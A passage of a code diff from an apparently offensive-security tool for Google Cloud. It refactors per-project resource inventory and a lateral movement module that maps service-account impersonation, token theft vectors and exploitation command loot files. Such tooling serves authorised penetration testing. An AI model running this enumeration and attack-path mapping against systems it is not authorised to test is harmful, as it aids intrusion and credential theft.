- // Storage - "Cloud Storage Buckets", - "Filestore Instances", - "BigQuery Datasets", - // Databases - "Cloud SQL Instances", - "Spanner Instances", - "Bigtable Instances", - "Memorystore Redis", - // Networking - "DNS Zones", - // Security - "Service Accounts", - "KMS Key Rings", - "Secrets", - "API Keys", - // DevOps - "Cloud Build Triggers", - "Source Repositories", - "Artifact Registries", - // Data - "Pub/Sub Topics", - "Pub/Sub Subscriptions", - "Dataflow Jobs", - "Dataproc Clusters", - // AI/ML - "Notebook Instances", - // Scheduling - "Scheduler Jobs", - // Logging - "Log Sinks", - // Security Policies - "Cloud Armor Policies", - // Certificates - "SSL Certificates", - } - - for _, rt := range resourceTypes { - m.resourceCounts[rt] = make(map[string]int) - m.resourceIDs[rt] = make(map[string][]string) +// initializeResourceTypes sets up the resource type maps for a project +func (m *InventoryModule) initializeResourceTypesForProject(projectID string) { + m.mu.Lock() + defer m.mu.Unlock() + + if m.projectResourceCounts[projectID] != nil { + return // Already initialized } + + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) + m.projectRegions[projectID] = make(map[string]bool) + m.projectTotalByType[projectID] = make(map[string]int) + m.projectTotalByRegion[projectID] = make(map[string]int) } // processProject enumerates all resources in a single project @@ -410,7 +374,7 @@ func (m *InventoryModule) enumComputeInstances(ctx context.Context, projectID st for _, inst := range instances { region := extractRegionFromZone(inst.Zone) - m.addResource("Compute Instances", region, fmt.Sprintf("projects/%s/zones/%s/instances/%s", projectID, inst.Zone, inst.Name)) + m.addResource(projectID, "Compute Instances", region, fmt.Sprintf("projects/%s/zones/%s/instances/%s", projectID, inst.Zone, inst.Name)) } } @@ -426,7 +390,7 @@ func (m *InventoryModule) enumGKEClusters(ctx context.Context, projectID string, } for _, cluster := range clusters { - m.addResource("GKE Clusters", cluster.Location, fmt.Sprintf("projects/%s/locations/%s/clusters/%s", projectID, cluster.Location, cluster.Name)) + m.addResource(projectID, "GKE Clusters", cluster.Location, fmt.Sprintf("projects/%s/locations/%s/clusters/%s", projectID, cluster.Location, cluster.Name)) } } @@ -439,14 +403,14 @@ func (m *InventoryModule) enumCloudRun(ctx context.Context, projectID string, wg services, err := svc.Services(projectID) if err == nil { for _, s := range services { - m.addResource("Cloud Run Services", s.Region, fmt.Sprintf("projects/%s/locations/%s/services/%s", projectID, s.Region, s.Name)) + m.addResource(projectID, "Cloud Run Services", s.Region, fmt.Sprintf("projects/%s/locations/%s/services/%s", projectID, s.Region, s.Name)) } } jobs, err := svc.Jobs(projectID) if err == nil { for _, job := range jobs { - m.addResource("Cloud Run Jobs", job.Region, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Region, job.Name)) + m.addResource(projectID, "Cloud Run Jobs", job.Region, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Region, job.Name)) } } } @@ -463,7 +427,7 @@ func (m *InventoryModule) enumCloudFunctions(ctx context.Context, projectID stri } for _, fn := range functions { - m.addResource("Cloud Functions", fn.Region, fmt.Sprintf("projects/%s/locations/%s/functions/%s", projectID, fn.Region, fn.Name)) + m.addResource(projectID, "Cloud Functions", fn.Region, fmt.Sprintf("projects/%s/locations/%s/functions/%s", projectID, fn.Region, fn.Name)) } } @@ -479,7 +443,7 @@ func (m *InventoryModule) enumBuckets(ctx context.Context, projectID string, wg } for _, bucket := range buckets { - m.addResource("Cloud Storage Buckets", bucket.Location, fmt.Sprintf("gs://%s", bucket.Name)) + m.addResource(projectID, "Cloud Storage Buckets", bucket.Location, fmt.Sprintf("gs://%s", bucket.Name)) } } @@ -495,7 +459,7 @@ func (m *InventoryModule) enumBigQuery(ctx context.Context, projectID string, wg } for _, ds := range datasets { - m.addResource("BigQuery Datasets", ds.Location, fmt.Sprintf("projects/%s/datasets/%s", projectID, ds.DatasetID)) + m.addResource(projectID, "BigQuery Datasets", ds.Location, fmt.Sprintf("projects/%s/datasets/%s", projectID, ds.DatasetID)) } } @@ -511,7 +475,7 @@ func (m *InventoryModule) enumCloudSQL(ctx context.Context, projectID string, wg } for _, inst := range instances { - m.addResource("Cloud SQL Instances", inst.Region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + m.addResource(projectID, "Cloud SQL Instances", inst.Region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) } } @@ -532,7 +496,7 @@ func (m *InventoryModule) enumSpanner(ctx context.Context, projectID string, wg if inst.Config != "" { region = inst.Config } - m.addResource("Spanner Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + m.addResource(projectID, "Spanner Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) } } @@ -553,7 +517,7 @@ func (m *InventoryModule) enumBigtable(ctx context.Context, projectID string, wg if len(inst.Clusters) > 0 { region = inst.Clusters[0].Location } - m.addResource("Bigtable Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) + m.addResource(projectID, "Bigtable Instances", region, fmt.Sprintf("projects/%s/instances/%s", projectID, inst.Name)) } } @@ -569,7 +533,7 @@ func (m *InventoryModule) enumMemorystore(ctx context.Context, projectID string, } for _, inst := range instances { - m.addResource("Memorystore Redis", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + m.addResource(projectID, "Memorystore Redis", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) } } @@ -585,7 +549,7 @@ func (m *InventoryModule) enumFilestore(ctx context.Context, projectID string, w } for _, inst := range instances { - m.addResource("Filestore Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + m.addResource(projectID, "Filestore Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) } } @@ -595,13 +559,14 @@ func (m *InventoryModule) enumServiceAccounts(ctx context.Context, projectID str defer func() { <-sem }() svc := iamservice.New() - accounts, err := svc.ServiceAccounts(projectID) + // Use ServiceAccountsBasic to avoid querying keys (faster, fewer permissions needed) + accounts, err := svc.ServiceAccountsBasic(projectID) if err != nil { return } for _, sa := range accounts { - m.addResource("Service Accounts", "global", sa.Email) + m.addResource(projectID, "Service Accounts", "global", sa.Email) } } @@ -617,7 +582,7 @@ func (m *InventoryModule) enumKMS(ctx context.Context, projectID string, wg *syn } for _, kr := range keyRings { - m.addResource("KMS Key Rings", kr.Location, fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name)) + m.addResource(projectID, "KMS Key Rings", kr.Location, fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name)) } } @@ -641,7 +606,7 @@ func (m *InventoryModule) enumSecrets(ctx context.Context, projectID string, wg if len(secret.ReplicaLocations) > 0 { region = secret.ReplicaLocations[0] } - m.addResource("Secrets", region, secret.Name) + m.addResource(projectID, "Secrets", region, secret.Name) } } @@ -657,7 +622,7 @@ func (m *InventoryModule) enumAPIKeys(ctx context.Context, projectID string, wg } for _, key := range keys { - m.addResource("API Keys", "global", key.Name) + m.addResource(projectID, "API Keys", "global", key.Name) } } @@ -670,14 +635,14 @@ func (m *InventoryModule) enumPubSub(ctx context.Context, projectID string, wg * topics, err := svc.Topics(projectID) if err == nil { for _, topic := range topics { - m.addResource("Pub/Sub Topics", "global", fmt.Sprintf("projects/%s/topics/%s", projectID, topic.Name)) + m.addResource(projectID, "Pub/Sub Topics", "global", fmt.Sprintf("projects/%s/topics/%s", projectID, topic.Name)) } } subscriptions, err := svc.Subscriptions(projectID) if err == nil { for _, sub := range subscriptions { - m.addResource("Pub/Sub Subscriptions", "global", fmt.Sprintf("projects/%s/subscriptions/%s", projectID, sub.Name)) + m.addResource(projectID, "Pub/Sub Subscriptions", "global", fmt.Sprintf("projects/%s/subscriptions/%s", projectID, sub.Name)) } } } @@ -694,7 +659,7 @@ func (m *InventoryModule) enumDNS(ctx context.Context, projectID string, wg *syn } for _, zone := range zones { - m.addResource("DNS Zones", "global", fmt.Sprintf("projects/%s/managedZones/%s", projectID, zone.Name)) + m.addResource(projectID, "DNS Zones", "global", fmt.Sprintf("projects/%s/managedZones/%s", projectID, zone.Name)) } } @@ -711,7 +676,7 @@ func (m *InventoryModule) enumCloudBuild(ctx context.Context, projectID string, for _, trigger := range triggers { region := "global" - m.addResource("Cloud Build Triggers", region, fmt.Sprintf("projects/%s/locations/%s/triggers/%s", projectID, region, trigger.Name)) + m.addResource(projectID, "Cloud Build Triggers", region, fmt.Sprintf("projects/%s/locations/%s/triggers/%s", projectID, region, trigger.Name)) } } @@ -727,7 +692,7 @@ func (m *InventoryModule) enumSourceRepos(ctx context.Context, projectID string, } for _, repo := range repos { - m.addResource("Source Repositories", "global", fmt.Sprintf("projects/%s/repos/%s", projectID, repo.Name)) + m.addResource(projectID, "Source Repositories", "global", fmt.Sprintf("projects/%s/repos/%s", projectID, repo.Name)) } } @@ -746,7 +711,7 @@ func (m *InventoryModule) enumArtifactRegistry(ctx context.Context, projectID st } for _, repo := range repos { - m.addResource("Artifact Registries", repo.Location, fmt.Sprintf("projects/%s/locations/%s/repositories/%s", projectID, repo.Location, repo.Name)) + m.addResource(projectID, "Artifact Registries", repo.Location, fmt.Sprintf("projects/%s/locations/%s/repositories/%s", projectID, repo.Location, repo.Name)) } } @@ -762,7 +727,7 @@ func (m *InventoryModule) enumDataflow(ctx context.Context, projectID string, wg } for _, job := range jobs { - m.addResource("Dataflow Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.ID)) + m.addResource(projectID, "Dataflow Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.ID)) } } @@ -778,7 +743,7 @@ func (m *InventoryModule) enumDataproc(ctx context.Context, projectID string, wg } for _, cluster := range clusters { - m.addResource("Dataproc Clusters", cluster.Region, fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, cluster.Region, cluster.Name)) + m.addResource(projectID, "Dataproc Clusters", cluster.Region, fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, cluster.Region, cluster.Name)) } } @@ -794,7 +759,7 @@ func (m *InventoryModule) enumNotebooks(ctx context.Context, projectID string, w } for _, inst := range instances { - m.addResource("Notebook Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) + m.addResource(projectID, "Notebook Instances", inst.Location, fmt.Sprintf("projects/%s/locations/%s/instances/%s", projectID, inst.Location, inst.Name)) } } @@ -810,7 +775,7 @@ func (m *InventoryModule) enumComposer(ctx context.Context, projectID string, wg } for _, env := range envs { - m.addResource("Composer Environments", env.Location, fmt.Sprintf("projects/%s/locations/%s/environments/%s", projectID, env.Location, env.Name)) + m.addResource(projectID, "Composer Environments", env.Location, fmt.Sprintf("projects/%s/locations/%s/environments/%s", projectID, env.Location, env.Name)) } } @@ -826,7 +791,7 @@ func (m *InventoryModule) enumScheduler(ctx context.Context, projectID string, w } for _, job := range jobs { - m.addResource("Scheduler Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.Name)) + m.addResource(projectID, "Scheduler Jobs", job.Location, fmt.Sprintf("projects/%s/locations/%s/jobs/%s", projectID, job.Location, job.Name)) } } @@ -842,7 +807,7 @@ func (m *InventoryModule) enumLoggingSinks(ctx context.Context, projectID string } for _, sink := range sinks { - m.addResource("Log Sinks", "global", fmt.Sprintf("projects/%s/sinks/%s", projectID, sink.Name)) + m.addResource(projectID, "Log Sinks", "global", fmt.Sprintf("projects/%s/sinks/%s", projectID, sink.Name)) } } @@ -858,7 +823,7 @@ func (m *InventoryModule) enumCloudArmor(ctx context.Context, projectID string, } for _, policy := range policies { - m.addResource("Cloud Armor Policies", "global", fmt.Sprintf("projects/%s/global/securityPolicies/%s", projectID, policy.Name)) + m.addResource(projectID, "Cloud Armor Policies", "global", fmt.Sprintf("projects/%s/global/securityPolicies/%s", projectID, policy.Name)) } } @@ -874,12 +839,12 @@ func (m *InventoryModule) enumSSLCertificates(ctx context.Context, projectID str } for _, cert := range certs { - m.addResource("SSL Certificates", cert.Location, fmt.Sprintf("projects/%s/locations/%s/certificates/%s", projectID, cert.Location, cert.Name)) + m.addResource(projectID, "SSL Certificates", cert.Location, fmt.Sprintf("projects/%s/locations/%s/certificates/%s", projectID, cert.Location, cert.Name)) } } -// addResource safely adds a resource count -func (m *InventoryModule) addResource(resourceType, region, resourceID string) { +// addResource safely adds a resource count for a specific project +func (m *InventoryModule) addResource(projectID, resourceType, region, resourceID string) { m.mu.Lock() defer m.mu.Unlock() @@ -889,29 +854,48 @@ func (m *InventoryModule) addResource(resourceType, region, resourceID string) { } region = strings.ToLower(region) - // Track region - m.regions[region] = true + // Track region for this project + if m.projectRegions[projectID] == nil { + m.projectRegions[projectID] = make(map[string]bool) + } + m.projectRegions[projectID][region] = true // Increment count - if m.resourceCounts[resourceType] == nil { - m.resourceCounts[resourceType] = make(map[string]int) + if m.projectResourceCounts[projectID] == nil { + m.projectResourceCounts[projectID] = make(map[string]map[string]int) + } + if m.projectResourceCounts[projectID][resourceType] == nil { + m.projectResourceCounts[projectID][resourceType] = make(map[string]int) } - m.resourceCounts[resourceType][region]++ + m.projectResourceCounts[projectID][resourceType][region]++ // Track resource ID - if m.resourceIDs[resourceType] == nil { - m.resourceIDs[resourceType] = make(map[string][]string) + if m.projectResourceIDs[projectID] == nil { + m.projectResourceIDs[projectID] = make(map[string]map[string][]string) } - m.resourceIDs[resourceType][region] = append(m.resourceIDs[resourceType][region], resourceID) + if m.projectResourceIDs[projectID][resourceType] == nil { + m.projectResourceIDs[projectID][resourceType] = make(map[string][]string) + } + m.projectResourceIDs[projectID][resourceType][region] = append(m.projectResourceIDs[projectID][resourceType][region], resourceID) } -// calculateTotals computes the total counts +// calculateTotals computes the total counts per project and globally func (m *InventoryModule) calculateTotals() { - for resourceType, regionCounts := range m.resourceCounts { - for region, count := range regionCounts { - m.totalByType[resourceType] += count - m.totalByRegion[region] += count - m.grandTotal += count + for projectID, resourceCounts := range m.projectResourceCounts { + if m.projectTotalByType[projectID] == nil { + m.projectTotalByType[projectID] = make(map[string]int) + } + if m.projectTotalByRegion[projectID] == nil { + m.projectTotalByRegion[projectID] = make(map[string]int) + } + + for resourceType, regionCounts := range resourceCounts { + for region, count := range regionCounts { + m.projectTotalByType[projectID][resourceType] += count + m.projectTotalByRegion[projectID][region] += count + m.projectGrandTotal[projectID] += count + m.grandTotal += count + } } } } @@ -1316,6 +1300,9 @@ func (m *InventoryModule) buildProjectOutput(projectID string) internal.Cloudfox projectAssetTotal += count } + // Get project-specific detailed resource counts + projectResourceTotal := m.projectGrandTotal[projectID] + // ======================================== // Table 1: Complete Asset Inventory (from Cloud Asset API) // ======================================== @@ -1421,11 +1408,10 @@ func (m *InventoryModule) buildProjectOutput(projectID string) internal.Cloudfox // ======================================== // Table 2: Detailed Enumeration by Region (from dedicated CloudFox modules) - // Note: resourceCounts/resourceIDs are currently aggregated, not per-project - // This table shows the aggregated view (same for all projects for now) + // Now uses per-project resource tracking // ======================================== - if m.grandTotal > 0 { - sortedRegions := m.getSortedRegions() + if projectResourceTotal > 0 { + sortedRegions := m.getSortedRegionsForProject(projectID) // Build header: Resource Type, then regions header := []string{"Resource Type"} @@ -1438,34 +1424,34 @@ func (m *InventoryModule) buildProjectOutput(projectID string) internal.Cloudfox // Add total row first totalRow := []string{"TOTAL"} for _, region := range sortedRegions { - totalRow = append(totalRow, strconv.Itoa(m.totalByRegion[region])) + totalRow = append(totalRow, strconv.Itoa(m.projectTotalByRegion[projectID][region])) } - totalRow = append(totalRow, strconv.Itoa(m.grandTotal)) + totalRow = append(totalRow, strconv.Itoa(projectResourceTotal)) body = append(body, totalRow) // Sort resource types alphabetically var resourceTypes []string - for rt := range m.totalByType { + for rt := range m.projectTotalByType[projectID] { resourceTypes = append(resourceTypes, rt) } sort.Strings(resourceTypes) // Add row for each resource type (only if it has resources) for _, resourceType := range resourceTypes { - if m.totalByType[resourceType] == 0 { + if m.projectTotalByType[projectID][resourceType] == 0 { continue } row := []string{resourceType} for _, region := range sortedRegions { - count := m.resourceCounts[resourceType][region] + count := m.projectResourceCounts[projectID][resourceType][region] if count > 0 { row = append(row, strconv.Itoa(count)) } else { row = append(row, "-") } } - row = append(row, strconv.Itoa(m.totalByType[resourceType])) + row = append(row, strconv.Itoa(m.projectTotalByType[projectID][resourceType])) body = append(body, row) } @@ -1484,24 +1470,26 @@ func (m *InventoryModule) buildProjectOutput(projectID string) internal.Cloudfox lootContent.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) lootContent.WriteString("# Generated by CloudFox\n") lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", projectAssetTotal)) - lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", m.grandTotal)) + lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", projectResourceTotal)) // Sort resource types var resourceTypes []string - for rt := range m.totalByType { + for rt := range m.projectTotalByType[projectID] { resourceTypes = append(resourceTypes, rt) } sort.Strings(resourceTypes) - sortedRegions := m.getSortedRegions() + sortedRegions := m.getSortedRegionsForProject(projectID) for _, resourceType := range resourceTypes { - if m.totalByType[resourceType] == 0 { + if m.projectTotalByType[projectID][resourceType] == 0 { continue } - lootContent.WriteString(fmt.Sprintf("## %s (%d)\n", resourceType, m.totalByType[resourceType])) + lootContent.WriteString(fmt.Sprintf("## %s (%d)\n", resourceType, m.projectTotalByType[projectID][resourceType])) for _, region := range sortedRegions { - for _, resourceID := range m.resourceIDs[resourceType][region] { - lootContent.WriteString(fmt.Sprintf("%s\n", resourceID)) + if m.projectResourceIDs[projectID] != nil && m.projectResourceIDs[projectID][resourceType] != nil { + for _, resourceID := range m.projectResourceIDs[projectID][resourceType][region] { + lootContent.WriteString(fmt.Sprintf("%s\n", resourceID)) + } } } lootContent.WriteString("\n") @@ -1523,10 +1511,13 @@ func (m *InventoryModule) buildProjectOutput(projectID string) internal.Cloudfox } } -// getSortedRegions returns regions sorted by count, with "global" first -func (m *InventoryModule) getSortedRegions() []string { +// getSortedRegionsForProject returns regions sorted by count for a specific project, with "global" first +func (m *InventoryModule) getSortedRegionsForProject(projectID string) []string { var regions []string - for region := range m.regions { + if m.projectRegions[projectID] == nil { + return regions + } + for region := range m.projectRegions[projectID] { regions = append(regions, region) } @@ -1539,7 +1530,7 @@ func (m *InventoryModule) getSortedRegions() []string { if regions[j] == "global" { return false } - return m.totalByRegion[regions[i]] > m.totalByRegion[regions[j]] + return m.projectTotalByRegion[projectID][regions[i]] > m.projectTotalByRegion[projectID][regions[j]] }) return regions diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index b94c6e17..ab16ec28 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -6,9 +6,9 @@ import ( "strings" "sync" - attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" GKEService "github.com/BishopFox/cloudfox/gcp/services/gkeService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" @@ -28,31 +28,60 @@ var GCPLateralMovementCommand = &cobra.Command{ Short: "Map lateral movement paths, credential theft vectors, and pivot opportunities", Long: `Identify lateral movement opportunities within and across GCP projects. +This module uses FoxMapper graph data for permission-based analysis combined with +direct enumeration of compute resources for token theft vectors. + Features: - Maps service account impersonation chains (SA → SA → SA) - Identifies token creator permissions (lateral movement via impersonation) - Finds cross-project access paths - Detects VM metadata abuse vectors - Analyzes credential storage locations (secrets, environment variables) -- Maps attack paths from compromised identities - Generates exploitation commands for penetration testing +Prerequisites: +- Run 'foxmapper gcp graph create' for permission-based analysis + This module helps identify how an attacker could move laterally after gaining initial access to a GCP environment.`, Run: runGCPLateralMovementCommand, } +// ------------------------------ +// Data Structures +// ------------------------------ + +// LateralMovementPath represents a lateral movement opportunity +type LateralMovementPath struct { + Source string // Starting point (principal or resource) + SourceType string // Type of source (serviceAccount, user, compute_instance, etc.) + Target string // Target resource/identity + Method string // How the lateral movement is achieved + Category string // Category of lateral movement + Permissions []string // Permissions required + Description string // Human-readable description + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + ExploitCommand string // Command to exploit + ProjectID string // Project where this path exists +} + // ------------------------------ // Module Struct // ------------------------------ type LateralMovementModule struct { gcpinternal.BaseGCPModule - // All lateral movement paths using centralized AttackPath struct - AllPaths []attackpathservice.AttackPath - ProjectPaths map[string][]attackpathservice.AttackPath // projectID -> paths - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + // Paths from enumeration + ProjectPaths map[string][]LateralMovementPath // projectID -> paths + AllPaths []LateralMovementPath // All paths combined + + // FoxMapper findings + FoxMapperFindings []foxmapperservice.LateralFinding // FoxMapper-based findings + FoxMapperCache *gcpinternal.FoxMapperCache + + // Loot + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -76,10 +105,11 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { } module := &LateralMovementModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - AllPaths: []attackpathservice.AttackPath{}, - ProjectPaths: make(map[string][]attackpathservice.AttackPath), - LootMap: make(map[string]map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPaths: make(map[string][]LateralMovementPath), + AllPaths: []LateralMovementPath{}, + FoxMapperFindings: []foxmapperservice.LateralFinding{}, + LootMap: make(map[string]map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -91,52 +121,41 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) - var usedCache bool - - // Check if attack path analysis was already run (via --attack-paths flag) - if cache := gcpinternal.GetAttackPathCacheFromContext(ctx); cache != nil && cache.HasRawData() { - if cachedResult, ok := cache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM("Using cached attack path analysis results", GCP_LATERALMOVEMENT_MODULE_NAME) - m.loadFromCachedData(cachedResult) - usedCache = true + // Get FoxMapper cache from context or try to load it + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + // Try to load FoxMapper data (org from hierarchy if available) + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) } - // If no context cache, try loading from disk cache - if !usedCache { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.HasRawData() { - if cachedResult, ok := diskCache.GetRawData().(*attackpathservice.CombinedAttackPathData); ok { - logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, projects: %v)", - metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.ProjectsIn), GCP_LATERALMOVEMENT_MODULE_NAME) - m.loadFromCachedData(cachedResult) - usedCache = true - } - } - } - - // If no cached data, run full analysis - if !usedCache { - logger.InfoM("Running lateral movement analysis...", GCP_LATERALMOVEMENT_MODULE_NAME) - - // Analyze org and folder level lateral movement paths (runs once for all projects) - m.analyzeOrgFolderLateralPaths(ctx, logger) + // Process each project for actual token theft vectors + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) - // Process each project - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + // Consolidate project paths + for _, paths := range m.ProjectPaths { + m.AllPaths = append(m.AllPaths, paths...) + } - // Consolidate all paths - for _, paths := range m.ProjectPaths { - m.AllPaths = append(m.AllPaths, paths...) + // Analyze permission-based lateral movement using FoxMapper + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Analyzing permission-based lateral movement using FoxMapper...", GCP_LATERALMOVEMENT_MODULE_NAME) + svc := m.FoxMapperCache.GetService() + m.FoxMapperFindings = svc.AnalyzeLateral("") + if len(m.FoxMapperFindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d permission-based lateral movement techniques", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) } - - // Save to disk cache for future use (run full analysis for all attack types) - // Skip if running under all-checks (consolidated save happens at the end) - m.saveToAttackPathCache(ctx, logger) + } else { + logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_LATERALMOVEMENT_MODULE_NAME) } // Check results - if len(m.AllPaths) == 0 { + hasResults := len(m.AllPaths) > 0 || len(m.FoxMapperFindings) > 0 + + if !hasResults { logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) return } @@ -147,150 +166,80 @@ func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Log categoryCounts[path.Category]++ } - logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s)", len(m.AllPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s) from enumeration", len(m.AllPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + if len(m.FoxMapperFindings) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based lateral movement technique(s)", len(m.FoxMapperFindings)), GCP_LATERALMOVEMENT_MODULE_NAME) + } m.writeOutput(ctx, logger) } -// loadFromCachedData loads lateral movement paths from cached attack path data -func (m *LateralMovementModule) loadFromCachedData(data *attackpathservice.CombinedAttackPathData) { - // Filter to only include lateral paths - for _, path := range data.AllPaths { - if path.PathType == "lateral" { - m.AllPaths = append(m.AllPaths, path) - // Also organize by project - if path.ScopeType == "project" && path.ScopeID != "" { - m.ProjectPaths[path.ScopeID] = append(m.ProjectPaths[path.ScopeID], path) - } else if path.ScopeType == "organization" { - m.ProjectPaths["organization"] = append(m.ProjectPaths["organization"], path) - } else if path.ScopeType == "folder" { - m.ProjectPaths["folder"] = append(m.ProjectPaths["folder"], path) - } +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["lateral-movement-commands"] = &internal.LootFile{ + Name: "lateral-movement-commands", + Contents: "# Lateral Movement Exploit Commands\n# Generated by CloudFox\n\n", } } } -// saveToAttackPathCache saves attack path data to disk cache -func (m *LateralMovementModule) saveToAttackPathCache(ctx context.Context, logger internal.Logger) { - // Skip saving if running under all-checks (consolidated save happens at the end) - if gcpinternal.IsAllChecksMode(ctx) { - logger.InfoM("Skipping individual cache save (all-checks mode)", GCP_LATERALMOVEMENT_MODULE_NAME) - return - } - - // Run full analysis (all types) so we can cache for other modules - svc := attackpathservice.New() - fullResult, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "all") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not run full attack path analysis for caching: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) - return - } - - cache := gcpinternal.NewAttackPathCache() - - // Populate cache with paths from all scopes - var pathInfos []gcpinternal.AttackPathInfo - for _, path := range fullResult.AllPaths { - pathInfos = append(pathInfos, gcpinternal.AttackPathInfo{ - Principal: path.Principal, - PrincipalType: path.PrincipalType, - Method: path.Method, - PathType: gcpinternal.AttackPathType(path.PathType), - Category: path.Category, - RiskLevel: path.RiskLevel, - Target: path.TargetResource, - Permissions: path.Permissions, - ScopeType: path.ScopeType, - ScopeID: path.ScopeID, - }) - } - cache.PopulateFromPaths(pathInfos) - cache.SetRawData(fullResult) - - // Save to disk - err = gcpinternal.SaveAttackPathCacheToFile(cache, m.ProjectIDs, m.OutputDirectory, m.Account, "1.0") - if err != nil { - logger.InfoM(fmt.Sprintf("Could not save attack path cache: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) - } else { - privesc, exfil, lateral := cache.GetStats() - logger.InfoM(fmt.Sprintf("Saved attack path cache to disk (%d privesc, %d exfil, %d lateral)", - privesc, exfil, lateral), GCP_LATERALMOVEMENT_MODULE_NAME) - } -} +func (m *LateralMovementModule) generatePlaybook() *internal.LootFile { + var sb strings.Builder + sb.WriteString("# GCP Lateral Movement Playbook\n") + sb.WriteString("# Generated by CloudFox\n\n") -// analyzeOrgFolderLateralPaths analyzes organization and folder level IAM for lateral movement permissions -func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context, logger internal.Logger) { - attackSvc := attackpathservice.New() + // Token theft vectors + if len(m.AllPaths) > 0 { + sb.WriteString("## Token Theft Vectors\n\n") - // Analyze organization-level IAM - orgPaths, orgNames, _, err := attackSvc.AnalyzeOrganizationAttackPaths(ctx, "lateral") - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, "Could not analyze organization-level lateral movement paths") + // Group by category + byCategory := 